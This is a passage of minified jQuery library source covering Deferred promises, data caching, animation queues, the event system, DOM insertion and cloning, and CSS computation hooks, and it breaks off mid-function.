o[t[0]+"With"](this===o?void 0:this,arguments),this},o[t[0]+"With"]=a.fireWith}),i.promise(o),t&&t.call(o,o),o},when:function(e){var t=arguments.length,n=t,r=Array(n),i=o.call(arguments),a=w.Deferred(),s=function(e){return function(n){r[e]=this,i[e]=arguments.length>1?o.call(arguments):n,--t||a.resolveWith(r,i)}};if(t<=1&&($(e,a.done(s(n)).resolve,a.reject,!t),"pending"===a.state()||g(i[n]&&i[n].then)))return a.then();while(n--)$(i[n],s(n),a.reject);return a.promise()}});var B=/^(Eval|Internal|Range|Reference|Syntax|Type|URI)Error$/;w.Deferred.exceptionHook=function(t,n){e.console&&e.console.warn&&t&&B.test(t.name)&&e.console.warn("jQuery.Deferred exception: "+t.message,t.stack,n)},w.readyException=function(t){e.setTimeout(function(){throw t})};var F=w.Deferred();w.fn.ready=function(e){return F.then(e)["catch"](function(e){w.readyException(e)}),this},w.extend({isReady:!1,readyWait:1,ready:function(e){(!0===e?--w.readyWait:w.isReady)||(w.isReady=!0,!0!==e&&--w.readyWait>0||F.resolveWith(r,[w]))}}),w.ready.then=F.then;function _(){r.removeEventListener("DOMContentLoaded",_),e.removeEventListener("load",_),w.ready()}"complete"===r.readyState||"loading"!==r.readyState&&!r.documentElement.doScroll?e.setTimeout(w.ready):(r.addEventListener("DOMContentLoaded",_),e.addEventListener("load",_));var z=function(e,t,n,r,i,o,a){var s=0,u=e.length,l=null==n;if("object"===x(n)){i=!0;for(s in n)z(e,t,s,n[s],!0,o,a)}else if(void 0!==r&&(i=!0,g(r)||(a=!0),l&&(a?(t.call(e,r),t=null):(l=t,t=function(e,t,n){return l.call(w(e),n)})),t))for(;s<u;s++)t(e[s],n,a?r:r.call(e[s],s,t(e[s],n)));return i?e:l?t.call(e):u?t(e[0],n):o},X=/^-ms-/,U=/-([a-z])/g;function V(e,t){return t.toUpperCase()}function G(e){return e.replace(X,"ms-").replace(U,V)}var Y=function(e){return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function Q(){this.expando=w.expando+Q.uid++}Q.uid=1,Q.prototype={cache:function(e){var t=e[this.expando];return t||(t={},Y(e)&&(e.nodeType?e[this.expando]=t:Object.defineProperty(e,this.expando,{value:t,configurable:!0}))),t},set:function(e,t,n){var r,i=this.cache(e);if("string"==typeof t)i[G(t)]=n;else for(r in t)i[G(r)]=t[r];return i},get:function(e,t){return void 0===t?this.cache(e):e[this.expando]&&e[this.expando][G(t)]},access:function(e,t,n){return void 0===t||t&&"string"==typeof t&&void 0===n?this.get(e,t):(this.set(e,t,n),void 0!==n?n:t)},remove:function(e,t){var n,r=e[this.expando];if(void 0!==r){if(void 0!==t){n=(t=Array.isArray(t)?t.map(G):(t=G(t))in r?[t]:t.match(M)||[]).length;while(n--)delete r[t[n]]}(void 0===t||w.isEmptyObject(r))&&(e.nodeType?e[this.expando]=void 0:delete e[this.expando])}},hasData:function(e){var t=e[this.expando];return void 0!==t&&!w.isEmptyObject(t)}};var J=new Q,K=new Q,Z=/^(?:\{[\w\W]*\}|\[[\w\W]*\])$/,ee=/[A-Z]/g;function te(e){return"true"===e||"false"!==e&&("null"===e?null:e===+e+""?+e:Z.test(e)?JSON.parse(e):e)}function ne(e,t,n){var r;if(void 0===n&&1===e.nodeType)if(r="data-"+t.replace(ee,"-$&").toLowerCase(),"string"==typeof(n=e.getAttribute(r))){try{n=te(n)}catch(e){}K.set(e,t,n)}else n=void 0;return n}w.extend({hasData:function(e){return K.hasData(e)||J.hasData(e)},data:function(e,t,n){return K.access(e,t,n)},removeData:function(e,t){K.remove(e,t)},_data:function(e,t,n){return J.access(e,t,n)},_removeData:function(e,t){J.remove(e,t)}}),w.fn.extend({data:function(e,t){var n,r,i,o=this[0],a=o&&o.attributes;if(void 0===e){if(this.length&&(i=K.get(o),1===o.nodeType&&!J.get(o,"hasDataAttrs"))){n=a.length;while(n--)a[n]&&0===(r=a[n].name).indexOf("data-")&&(r=G(r.slice(5)),ne(o,r,i[r]));J.set(o,"hasDataAttrs",!0)}return i}return"object"==typeof e?this.each(function(){K.set(this,e)}):z(this,function(t){var n;if(o&&void 0===t){if(void 0!==(n=K.get(o,e)))return n;if(void 0!==(n=ne(o,e)))return n}else this.each(function(){K.set(this,e,t)})},null,t,arguments.length>1,null,!0)},removeData:function(e){return this.each(function(){K.remove(this,e)})}}),w.extend({queue:function(e,t,n){var r;if(e)return t=(t||"fx")+"queue",r=J.get(e,t),n&&(!r||Array.isArray(n)?r=J.access(e,t,w.makeArray(n)):r.push(n)),r||[]},dequeue:function(e,t){t=t||"fx";var n=w.queue(e,t),r=n.length,i=n.shift(),o=w._queueHooks(e,t),a=function(){w.dequeue(e,t)};"inprogress"===i&&(i=n.shift(),r--),i&&("fx"===t&&n.unshift("inprogress"),delete o.stop,i.call(e,a,o)),!r&&o&&o.empty.fire()},_queueHooks:function(e,t){var n=t+"queueHooks";return J.get(e,n)||J.access(e,n,{empty:w.Callbacks("once memory").add(function(){J.remove(e,[t+"queue",n])})})}}),w.fn.extend({queue:function(e,t){var n=2;return"string"!=typeof e&&(t=e,e="fx",n--),arguments.length<n?w.queue(this[0],e):void 0===t?this:this.each(function(){var n=w.queue(this,e,t);w._queueHooks(this,e),"fx"===e&&"inprogress"!==n[0]&&w.dequeue(this,e)})},dequeue:function(e){return this.each(function(){w.dequeue(this,e)})},clearQueue:function(e){return this.queue(e||"fx",[])},promise:function(e,t){var n,r=1,i=w.Deferred(),o=this,a=this.length,s=function(){--r||i.resolveWith(o,[o])};"string"!=typeof e&&(t=e,e=void 0),e=e||"fx";while(a--)(n=J.get(o[a],e+"queueHooks"))&&n.empty&&(r++,n.empty.add(s));return s(),i.promise(t)}});var re=/[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/.source,ie=new RegExp("^(?:([+-])=|)("+re+")([a-z%]*)$","i"),oe=["Top","Right","Bottom","Left"],ae=function(e,t){return"none"===(e=t||e).style.display||""===e.style.display&&w.contains(e.ownerDocument,e)&&"none"===w.css(e,"display")},se=function(e,t,n,r){var i,o,a={};for(o in t)a[o]=e.style[o],e.style[o]=t[o];i=n.apply(e,r||[]);for(o in t)e.style[o]=a[o];return i};function ue(e,t,n,r){var i,o,a=20,s=r?function(){return r.cur()}:function(){return w.css(e,t,"")},u=s(),l=n&&n[3]||(w.cssNumber[t]?"":"px"),c=(w.cssNumber[t]||"px"!==l&&+u)&&ie.exec(w.css(e,t));if(c&&c[3]!==l){u/=2,l=l||c[3],c=+u||1;while(a--)w.style(e,t,c+l),(1-o)*(1-(o=s()/u||.5))<=0&&(a=0),c/=o;c*=2,w.style(e,t,c+l),n=n||[]}return n&&(c=+c||+u||0,i=n[1]?c+(n[1]+1)*n[2]:+n[2],r&&(r.unit=l,r.start=c,r.end=i)),i}var le={};function ce(e){var t,n=e.ownerDocument,r=e.nodeName,i=le[r];return i||(t=n.body.appendChild(n.createElement(r)),i=w.css(t,"display"),t.parentNode.removeChild(t),"none"===i&&(i="block"),le[r]=i,i)}function fe(e,t){for(var n,r,i=[],o=0,a=e.length;o<a;o++)(r=e[o]).style&&(n=r.style.display,t?("none"===n&&(i[o]=J.get(r,"display")||null,i[o]||(r.style.display="")),""===r.style.display&&ae(r)&&(i[o]=ce(r))):"none"!==n&&(i[o]="none",J.set(r,"display",n)));for(o=0;o<a;o++)null!=i[o]&&(e[o].style.display=i[o]);return e}w.fn.extend({show:function(){return fe(this,!0)},hide:function(){return fe(this)},toggle:function(e){return"boolean"==typeof e?e?this.show():this.hide():this.each(function(){ae(this)?w(this).show():w(this).hide()})}});var pe=/^(?:checkbox|radio)$/i,de=/<([a-z][^\/\0>\x20\t\r\n\f]+)/i,he=/^$|^module$|\/(?:java|ecma)script/i,ge={option:[1,"<select multiple='multiple'>","</select>"],thead:[1,"<table>","</table>"],col:[2,"<table><colgroup>","</colgroup></table>"],tr:[2,"<table><tbody>","</tbody></table>"],td:[3,"<table><tbody><tr>","</tr></tbody></table>"],_default:[0,"",""]};ge.optgroup=ge.option,ge.tbody=ge.tfoot=ge.colgroup=ge.caption=ge.thead,ge.th=ge.td;function ye(e,t){var n;return n="undefined"!=typeof e.getElementsByTagName?e.getElementsByTagName(t||"*"):"undefined"!=typeof e.querySelectorAll?e.querySelectorAll(t||"*"):[],void 0===t||t&&N(e,t)?w.merge([e],n):n}function ve(e,t){for(var n=0,r=e.length;n<r;n++)J.set(e[n],"globalEval",!t||J.get(t[n],"globalEval"))}var me=/<|&#?\w+;/;function xe(e,t,n,r,i){for(var o,a,s,u,l,c,f=t.createDocumentFragment(),p=[],d=0,h=e.length;d<h;d++)if((o=e[d])||0===o)if("object"===x(o))w.merge(p,o.nodeType?[o]:o);else if(me.test(o)){a=a||f.appendChild(t.createElement("div")),s=(de.exec(o)||["",""])[1].toLowerCase(),u=ge[s]||ge._default,a.innerHTML=u[1]+w.htmlPrefilter(o)+u[2],c=u[0];while(c--)a=a.lastChild;w.merge(p,a.childNodes),(a=f.firstChild).textContent=""}else p.push(t.createTextNode(o));f.textContent="",d=0;while(o=p[d++])if(r&&w.inArray(o,r)>-1)i&&i.push(o);else if(l=w.contains(o.ownerDocument,o),a=ye(f.appendChild(o),"script"),l&&ve(a),n){c=0;while(o=a[c++])he.test(o.type||"")&&n.push(o)}return f}!function(){var e=r.createDocumentFragment().appendChild(r.createElement("div")),t=r.createElement("input");t.setAttribute("type","radio"),t.setAttribute("checked","checked"),t.setAttribute("name","t"),e.appendChild(t),h.checkClone=e.cloneNode(!0).cloneNode(!0).lastChild.checked,e.innerHTML="<textarea>x</textarea>",h.noCloneChecked=!!e.cloneNode(!0).lastChild.defaultValue}();var be=r.documentElement,we=/^key/,Te=/^(?:mouse|pointer|contextmenu|drag|drop)|click/,Ce=/^([^.]*)(?:\.(.+)|)/;function Ee(){return!0}function ke(){return!1}function Se(){try{return r.activeElement}catch(e){}}function De(e,t,n,r,i,o){var a,s;if("object"==typeof t){"string"!=typeof n&&(r=r||n,n=void 0);for(s in t)De(e,s,n,r,t[s],o);return e}if(null==r&&null==i?(i=n,r=n=void 0):null==i&&("string"==typeof n?(i=r,r=void 0):(i=r,r=n,n=void 0)),!1===i)i=ke;else if(!i)return e;return 1===o&&(a=i,(i=function(e){return w().off(e),a.apply(this,arguments)}).guid=a.guid||(a.guid=w.guid++)),e.each(function(){w.event.add(this,t,i,r,n)})}w.event={global:{},add:function(e,t,n,r,i){var o,a,s,u,l,c,f,p,d,h,g,y=J.get(e);if(y){n.handler&&(n=(o=n).handler,i=o.selector),i&&w.find.matchesSelector(be,i),n.guid||(n.guid=w.guid++),(u=y.events)||(u=y.events={}),(a=y.handle)||(a=y.handle=function(t){return"undefined"!=typeof w&&w.event.triggered!==t.type?w.event.dispatch.apply(e,arguments):void 0}),l=(t=(t||"").match(M)||[""]).length;while(l--)d=g=(s=Ce.exec(t[l])||[])[1],h=(s[2]||"").split(".").sort(),d&&(f=w.event.special[d]||{},d=(i?f.delegateType:f.bindType)||d,f=w.event.special[d]||{},c=w.extend({type:d,origType:g,data:r,handler:n,guid:n.guid,selector:i,needsContext:i&&w.expr.match.needsContext.test(i),namespace:h.join(".")},o),(p=u[d])||((p=u[d]=[]).delegateCount=0,f.setup&&!1!==f.setup.call(e,r,h,a)||e.addEventListener&&e.addEventListener(d,a)),f.add&&(f.add.call(e,c),c.handler.guid||(c.handler.guid=n.guid)),i?p.splice(p.delegateCount++,0,c):p.push(c),w.event.global[d]=!0)}},remove:function(e,t,n,r,i){var o,a,s,u,l,c,f,p,d,h,g,y=J.hasData(e)&&J.get(e);if(y&&(u=y.events)){l=(t=(t||"").match(M)||[""]).length;while(l--)if(s=Ce.exec(t[l])||[],d=g=s[1],h=(s[2]||"").split(".").sort(),d){f=w.event.special[d]||{},p=u[d=(r?f.delegateType:f.bindType)||d]||[],s=s[2]&&new RegExp("(^|\\.)"+h.join("\\.(?:.*\\.|)")+"(\\.|$)"),a=o=p.length;while(o--)c=p[o],!i&&g!==c.origType||n&&n.guid!==c.guid||s&&!s.test(c.namespace)||r&&r!==c.selector&&("**"!==r||!c.selector)||(p.splice(o,1),c.selector&&p.delegateCount--,f.remove&&f.remove.call(e,c));a&&!p.length&&(f.teardown&&!1!==f.teardown.call(e,h,y.handle)||w.removeEvent(e,d,y.handle),delete u[d])}else for(d in u)w.event.remove(e,d+t[l],n,r,!0);w.isEmptyObject(u)&&J.remove(e,"handle events")}},dispatch:function(e){var t=w.event.fix(e),n,r,i,o,a,s,u=new Array(arguments.length),l=(J.get(this,"events")||{})[t.type]||[],c=w.event.special[t.type]||{};for(u[0]=t,n=1;n<arguments.length;n++)u[n]=arguments[n];if(t.delegateTarget=this,!c.preDispatch||!1!==c.preDispatch.call(this,t)){s=w.event.handlers.call(this,t,l),n=0;while((o=s[n++])&&!t.isPropagationStopped()){t.currentTarget=o.elem,r=0;while((a=o.handlers[r++])&&!t.isImmediatePropagationStopped())t.rnamespace&&!t.rnamespace.test(a.namespace)||(t.handleObj=a,t.data=a.data,void 0!==(i=((w.event.special[a.origType]||{}).handle||a.handler).apply(o.elem,u))&&!1===(t.result=i)&&(t.preventDefault(),t.stopPropagation()))}return c.postDispatch&&c.postDispatch.call(this,t),t.result}},handlers:function(e,t){var n,r,i,o,a,s=[],u=t.delegateCount,l=e.target;if(u&&l.nodeType&&!("click"===e.type&&e.button>=1))for(;l!==this;l=l.parentNode||this)if(1===l.nodeType&&("click"!==e.type||!0!==l.disabled)){for(o=[],a={},n=0;n<u;n++)void 0===a[i=(r=t[n]).selector+" "]&&(a[i]=r.needsContext?w(i,this).index(l)>-1:w.find(i,this,null,[l]).length),a[i]&&o.push(r);o.length&&s.push({elem:l,handlers:o})}return l=this,u<t.length&&s.push({elem:l,handlers:t.slice(u)}),s},addProp:function(e,t){Object.defineProperty(w.Event.prototype,e,{enumerable:!0,configurable:!0,get:g(t)?function(){if(this.originalEvent)return t(this.originalEvent)}:function(){if(this.originalEvent)return this.originalEvent[e]},set:function(t){Object.defineProperty(this,e,{enumerable:!0,configurable:!0,writable:!0,value:t})}})},fix:function(e){return e[w.expando]?e:new w.Event(e)},special:{load:{noBubble:!0},focus:{trigger:function(){if(this!==Se()&&this.focus)return this.focus(),!1},delegateType:"focusin"},blur:{trigger:function(){if(this===Se()&&this.blur)return this.blur(),!1},delegateType:"focusout"},click:{trigger:function(){if("checkbox"===this.type&&this.click&&N(this,"input"))return this.click(),!1},_default:function(e){return N(e.target,"a")}},beforeunload:{postDispatch:function(e){void 0!==e.result&&e.originalEvent&&(e.originalEvent.returnValue=e.result)}}}},w.removeEvent=function(e,t,n){e.removeEventListener&&e.removeEventListener(t,n)},w.Event=function(e,t){if(!(this instanceof w.Event))return new w.Event(e,t);e&&e.type?(this.originalEvent=e,this.type=e.type,this.isDefaultPrevented=e.defaultPrevented||void 0===e.defaultPrevented&&!1===e.returnValue?Ee:ke,this.target=e.target&&3===e.target.nodeType?e.target.parentNode:e.target,this.currentTarget=e.currentTarget,this.relatedTarget=e.relatedTarget):this.type=e,t&&w.extend(this,t),this.timeStamp=e&&e.timeStamp||Date.now(),this[w.expando]=!0},w.Event.prototype={constructor:w.Event,isDefaultPrevented:ke,isPropagationStopped:ke,isImmediatePropagationStopped:ke,isSimulated:!1,preventDefault:function(){var e=this.originalEvent;this.isDefaultPrevented=Ee,e&&!this.isSimulated&&e.preventDefault()},stopPropagation:function(){var e=this.originalEvent;this.isPropagationStopped=Ee,e&&!this.isSimulated&&e.stopPropagation()},stopImmediatePropagation:function(){var e=this.originalEvent;this.isImmediatePropagationStopped=Ee,e&&!this.isSimulated&&e.stopImmediatePropagation(),this.stopPropagation()}},w.each({altKey:!0,bubbles:!0,cancelable:!0,changedTouches:!0,ctrlKey:!0,detail:!0,eventPhase:!0,metaKey:!0,pageX:!0,pageY:!0,shiftKey:!0,view:!0,"char":!0,charCode:!0,key:!0,keyCode:!0,button:!0,buttons:!0,clientX:!0,clientY:!0,offsetX:!0,offsetY:!0,pointerId:!0,pointerType:!0,screenX:!0,screenY:!0,targetTouches:!0,toElement:!0,touches:!0,which:function(e){var t=e.button;return null==e.which&&we.test(e.type)?null!=e.charCode?e.charCode:e.keyCode:!e.which&&void 0!==t&&Te.test(e.type)?1&t?1:2&t?3:4&t?2:0:e.which}},w.event.addProp),w.each({mouseenter:"mouseover",mouseleave:"mouseout",pointerenter:"pointerover",pointerleave:"pointerout"},function(e,t){w.event.special[e]={delegateType:t,bindType:t,handle:function(e){var n,r=this,i=e.relatedTarget,o=e.handleObj;return i&&(i===r||w.contains(r,i))||(e.type=o.origType,n=o.handler.apply(this,arguments),e.type=t),n}}}),w.fn.extend({on:function(e,t,n,r){return De(this,e,t,n,r)},one:function(e,t,n,r){return De(this,e,t,n,r,1)},off:function(e,t,n){var r,i;if(e&&e.preventDefault&&e.handleObj)return r=e.handleObj,w(e.delegateTarget).off(r.namespace?r.origType+"."+r.namespace:r.origType,r.selector,r.handler),this;if("object"==typeof e){for(i in e)this.off(i,t,e[i]);return this}return!1!==t&&"function"!=typeof t||(n=t,t=void 0),!1===n&&(n=ke),this.each(function(){w.event.remove(this,e,n,t)})}});var Ne=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([a-z][^\/\0>\x20\t\r\n\f]*)[^>]*)\/>/gi,Ae=/<script|<style|<link/i,je=/checked\s*(?:[^=]|=\s*.checked.)/i,qe=/^\s*<!(?:\[CDATA\[|--)|(?:\]\]|--)>\s*$/g;function Le(e,t){return N(e,"table")&&N(11!==t.nodeType?t:t.firstChild,"tr")?w(e).children("tbody")[0]||e:e}function He(e){return e.type=(null!==e.getAttribute("type"))+"/"+e.type,e}function Oe(e){return"true/"===(e.type||"").slice(0,5)?e.type=e.type.slice(5):e.removeAttribute("type"),e}function Pe(e,t){var n,r,i,o,a,s,u,l;if(1===t.nodeType){if(J.hasData(e)&&(o=J.access(e),a=J.set(t,o),l=o.events)){delete a.handle,a.events={};for(i in l)for(n=0,r=l[i].length;n<r;n++)w.event.add(t,i,l[i][n])}K.hasData(e)&&(s=K.access(e),u=w.extend({},s),K.set(t,u))}}function Me(e,t){var n=t.nodeName.toLowerCase();"input"===n&&pe.test(e.type)?t.checked=e.checked:"input"!==n&&"textarea"!==n||(t.defaultValue=e.defaultValue)}function Re(e,t,n,r){t=a.apply([],t);var i,o,s,u,l,c,f=0,p=e.length,d=p-1,y=t[0],v=g(y);if(v||p>1&&"string"==typeof y&&!h.checkClone&&je.test(y))return e.each(function(i){var o=e.eq(i);v&&(t[0]=y.call(this,i,o.html())),Re(o,t,n,r)});if(p&&(i=xe(t,e[0].ownerDocument,!1,e,r),o=i.firstChild,1===i.childNodes.length&&(i=o),o||r)){for(u=(s=w.map(ye(i,"script"),He)).length;f<p;f++)l=i,f!==d&&(l=w.clone(l,!0,!0),u&&w.merge(s,ye(l,"script"))),n.call(e[f],l,f);if(u)for(c=s[s.length-1].ownerDocument,w.map(s,Oe),f=0;f<u;f++)l=s[f],he.test(l.type||"")&&!J.access(l,"globalEval")&&w.contains(c,l)&&(l.src&&"module"!==(l.type||"").toLowerCase()?w._evalUrl&&w._evalUrl(l.src):m(l.textContent.replace(qe,""),c,l))}return e}function Ie(e,t,n){for(var r,i=t?w.filter(t,e):e,o=0;null!=(r=i[o]);o++)n||1!==r.nodeType||w.cleanData(ye(r)),r.parentNode&&(n&&w.contains(r.ownerDocument,r)&&ve(ye(r,"script")),r.parentNode.removeChild(r));return e}w.extend({htmlPrefilter:function(e){return e.replace(Ne,"<$1></$2>")},clone:function(e,t,n){var r,i,o,a,s=e.cloneNode(!0),u=w.contains(e.ownerDocument,e);if(!(h.noCloneChecked||1!==e.nodeType&&11!==e.nodeType||w.isXMLDoc(e)))for(a=ye(s),r=0,i=(o=ye(e)).length;r<i;r++)Me(o[r],a[r]);if(t)if(n)for(o=o||ye(e),a=a||ye(s),r=0,i=o.length;r<i;r++)Pe(o[r],a[r]);else Pe(e,s);return(a=ye(s,"script")).length>0&&ve(a,!u&&ye(e,"script")),s},cleanData:function(e){for(var t,n,r,i=w.event.special,o=0;void 0!==(n=e[o]);o++)if(Y(n)){if(t=n[J.expando]){if(t.events)for(r in t.events)i[r]?w.event.remove(n,r):w.removeEvent(n,r,t.handle);n[J.expando]=void 0}n[K.expando]&&(n[K.expando]=void 0)}}}),w.fn.extend({detach:function(e){return Ie(this,e,!0)},remove:function(e){return Ie(this,e)},text:function(e){return z(this,function(e){return void 0===e?w.text(this):this.empty().each(function(){1!==this.nodeType&&11!==this.nodeType&&9!==this.nodeType||(this.textContent=e)})},null,e,arguments.length)},append:function(){return Re(this,arguments,function(e){1!==this.nodeType&&11!==this.nodeType&&9!==this.nodeType||Le(this,e).appendChild(e)})},prepend:function(){return Re(this,arguments,function(e){if(1===this.nodeType||11===this.nodeType||9===this.nodeType){var t=Le(this,e);t.insertBefore(e,t.firstChild)}})},before:function(){return Re(this,arguments,function(e){this.parentNode&&this.parentNode.insertBefore(e,this)})},after:function(){return Re(this,arguments,function(e){this.parentNode&&this.parentNode.insertBefore(e,this.nextSibling)})},empty:function(){for(var e,t=0;null!=(e=this[t]);t++)1===e.nodeType&&(w.cleanData(ye(e,!1)),e.textContent="");return this},clone:function(e,t){return e=null!=e&&e,t=null==t?e:t,this.map(function(){return w.clone(this,e,t)})},html:function(e){return z(this,function(e){var t=this[0]||{},n=0,r=this.length;if(void 0===e&&1===t.nodeType)return t.innerHTML;if("string"==typeof e&&!Ae.test(e)&&!ge[(de.exec(e)||["",""])[1].toLowerCase()]){e=w.htmlPrefilter(e);try{for(;n<r;n++)1===(t=this[n]||{}).nodeType&&(w.cleanData(ye(t,!1)),t.innerHTML=e);t=0}catch(e){}}t&&this.empty().append(e)},null,e,arguments.length)},replaceWith:function(){var e=[];return Re(this,arguments,function(t){var n=this.parentNode;w.inArray(this,e)<0&&(w.cleanData(ye(this)),n&&n.replaceChild(t,this))},e)}}),w.each({appendTo:"append",prependTo:"prepend",insertBefore:"before",insertAfter:"after",replaceAll:"replaceWith"},function(e,t){w.fn[e]=function(e){for(var n,r=[],i=w(e),o=i.length-1,a=0;a<=o;a++)n=a===o?this:this.clone(!0),w(i[a])[t](n),s.apply(r,n.get());return this.pushStack(r)}});var We=new RegExp("^("+re+")(?!px)[a-z%]+$","i"),$e=function(t){var n=t.ownerDocument.defaultView;return n&&n.opener||(n=e),n.getComputedStyle(t)},Be=new RegExp(oe.join("|"),"i");!function(){function t(){if(c){l.style.cssText="position:absolute;left:-11111px;width:60px;margin-top:1px;padding:0;border:0",c.style.cssText="position:relative;display:block;box-sizing:border-box;overflow:scroll;margin:auto;border:1px;padding:1px;width:60%;top:1%",be.appendChild(l).appendChild(c);var t=e.getComputedStyle(c);i="1%"!==t.top,u=12===n(t.marginLeft),c.style.right="60%",s=36===n(t.right),o=36===n(t.width),c.style.position="absolute",a=36===c.offsetWidth||"absolute",be.removeChild(l),c=null}}function n(e){return Math.round(parseFloat(e))}var i,o,a,s,u,l=r.createElement("div"),c=r.createElement("div");c.style&&(c.style.backgroundClip="content-box",c.cloneNode(!0).style.backgroundClip="",h.clearCloneStyle="content-box"===c.style.backgroundClip,w.extend(h,{boxSizingReliable:function(){return t(),o},pixelBoxStyles:function(){return t(),s},pixelPosition:function(){return t(),i},reliableMarginLeft:function(){return t(),u},scrollboxSize:function(){return t(),a}}))}();function Fe(e,t,n){var r,i,o,a,s=e.style;return(n=n||$e(e))&&(""!==(a=n.getPropertyValue(t)||n[t])||w.contains(e.ownerDocument,e)||(a=w.style(e,t)),!h.pixelBoxStyles()&&We.test(a)&&Be.test(t)&&(r=s.width,i=s.minWidth,o=s.maxWidth,s.minWidth=s.maxWidth=s.width=a,a=n.width,s.width=r,s.minWidth=i,s.maxWidth=o)),void 0!==a?a+"":a}function _e(e,t){return{get:function(){if(!e())return(this.get=t).apply(this,arguments);delete this.get}}}var ze=/^(none|table(?!-c[ea]).+)/,Xe=/^--/,Ue={position:"absolute",visibility:"hidden",display:"block"},Ve={letterSpacing:"0",fontWeight:"400"},Ge=["Webkit","Moz","ms"],Ye=r.createElement("div").style;function Qe(e){if(e in Ye)return e;var t=e[0].toUpperCase()+e.slice(1),n=Ge.length;while(n--)if((e=Ge[n]+t)in Ye)return e}function Je(e){var t=w.cssProps[e];return t||(t=w.cssProps[e]=Qe(e)||e),t}function Ke(e,t,n){var r=ie.exec(t);return r?Math.max(0,r[2]-(n||0))+(r[3]||"px"):t}function Ze(e,t,n,r,i,o){var a="width"===t?1:0,s=0,u=0;if(n===(r?"border":"content"))return 0;for(;a<4;a+=2)"margin"===n&&(u+=w.css(e,n+oe[a],!0,i)),r?("content"===n&&(u-=w.css(e,"padding"+oe[a],!0,i)),"margin"!==n&&(u-=w.css(e,"border"+oe[a]+"Width",!0,i))):(u+=w.css(e,"padding"+oe[a],!0,i),"padding"!==n?u+=w.css(e,"border"+oe[a]+"Width",!0,i):s+=w.css(e,"border"+oe[a]+"Width",!0,i));return!r&&o>=0&&(u+=Math.max(0,Math.ceil(e["offset"+t[0].toUpperCase()+t.slice(1)]-o-u-s-.5))),u}function et(e,t,n){var r=$e(e),i=Fe(e,t,r),o="border-box"===w.css(e,"boxSizing",!1,r),a=o;if(We.test(i)){if(!n)return i;i="auto"}return a=a&&(h.boxSizingReliable()||i===e.style[t]),("auto"===i||!parseFloat(i)&&"inline"===w.css(e,"display",!1,r))&&(i=e["offset"+t[0].toUpperCase()+t.slice(1)],a=!0),(i=parseFloat(i)||0)+Ze(e,t,n||(o?"border":"content"),a,r,i)+"px"}w.extend({cssHooks:{opacity:{get:function(e,t){if(t){var n=Fe(e,"opacity");return""===n?"1":n}}}},cssNumber:{animationIterationCount:!0,columnCount:!0,fillOpacity:!0,flexGrow:!0,flexShrink:!0,fontWeight:!0,lineHeight:!0,opacity:!0,order:!0,orphans:!0,widows:!0,zIndex:!0,zoom:!0},cssProps:{},style:function(e,t,n,r){if(e&&3!==e.nodeType&&8!==e.nodeType&&e.style){var i,o,a,s=G(t),u=Xe.test(t),l=e.style;if(u||(t=Je(s)),a=w.cssHooks[t]||w.cssHooks[s],void 0===n)return a&&"get"in a&&void 0!==(i=a.get(e,!1,r))?i:l[t];"string"==(o=typeof n)&&(i=ie.exec(n))&&i[1]&&(n=ue(e,t,i),o="number"),null!=n&&n===n&&("number"===o&&(n+=i&&i[3]||(w.cssNumber[s]?"":"px")),h.clearCloneStyle||""!==n||0!==t.indexOf("background")||(l[t]="inherit"),a&&"set"in a&&void 0===(n=a.set(e,n,r))||(u?l.setProperty(t,n):l[t]=n))}},css:function(e,t,n,r){var i,o,a,s=G(t);return Xe.test(t)||(t=Je(s)),(a=w.cssHooks[t]||w.cssHooks[s])&&"get"in a&&(i=a.get(e,!0,n)),void 0===i&&(i=Fe(e,t,r)),"normal"===i&&t in Ve&&(i=Ve[t]),""===n||n?(o=parseFloat(i),!0===n||isFinite(o)?o||0:i):i}}),w.each(["height","width"],function(e,t){w.cssHooks[t]={get:function(e,n,r){if(n)return!ze.test(w.css(e,"display"))||e.getClientRects().length&&e.getBoundingClientRect().width?et(e,t,r):se(e,Ue,function(){return et(e,t,r)})},set:function(e,n,r){var i,o=$e(e),a="border-box"===w.css(e,"boxSizing",!1,o),s=r&&Ze(e,t,r,a,o);return a&&h.scrollboxSize()===o.position&&(s-=Math.ceil(e["offset"+t[0].toUpperCase()+t.slice(1)]-parseFloat(o[t])-Ze(e,t,"border",!1,o)-.5)),s&&(i=ie.exec(n))&&"px"!==(i[3]||"px")&&(e.style[t]=n,n=w.css(e,t)),Ke(e,n,s)}}}),w.cssHooks.marginLeft=_e(h.reliableMarginLeft,function(e,t){if(t)return(parseFloat(Fe(e,"marginLeft"))||e.getBoundingClientRect().left-se(e,{marginLeft:0},function(){return e.getBoundingClientRect().left}))+"px"}),w.each({margin:"",padding:"",border:"Width"},function(e,t){w.cssHooks[e+t]={expand:function(n){for(var r=0,i={},o="string"==typeof n?n.split(" "):[n];r<4;r++)i[e+oe[r]+t]=o[r]||o[r-2]||o[0];return i}},"margin"!==e&&(w.cssHooks[e+t].set=Ke)}),w.fn.extend({css:function(e,t){return z(this,function(e,t,n){var r,i,o={},a=0;if(Array.isArray(t)){for(r=$e(e),i=t.length;a<i;a++)o[t[a]]=w.css(e,t[a],!1,r);return o}return void 0!==n?w.style(e,t,n):w.css(e,t)},e,t,arguments.length>1)}});function tt(e,t,n,r,i){return new tt.prototype.init(e,t,n,r,i)}w.Tween=tt,tt.prototype={constructor:tt,init:function(e,t,n,r,i,o){this.elem=e,this.prop=n,this.easing=i||w.easing._default,this.options=t,this.start=this.now=this.cur(),this.end=r,this.unit=o||(w.cssNumber[n]?"":"px")},cur:function(){var e=tt.propHooks[this.prop];return e&&e.get?e.get(this):tt.propHooks._default.get(this)},run:function(e){var t,n=tt.propHooks[this.prop];return this.options.duration?this.pos=t=w.easing[this.easing](e,this.options.duration*e,0,1,this.options.duration):this.pos=t=e,this.now=(this.end-this.start)*t+this.start,this.options.step&&this.options.step.call(this.elem,this.now,this),n&&n.set?n.set(this):tt.propHooks._default.set(this),this}},tt.prototype.init.prototype=tt.prototype,tt.propHooks={_default:{get:function(e){var t;return 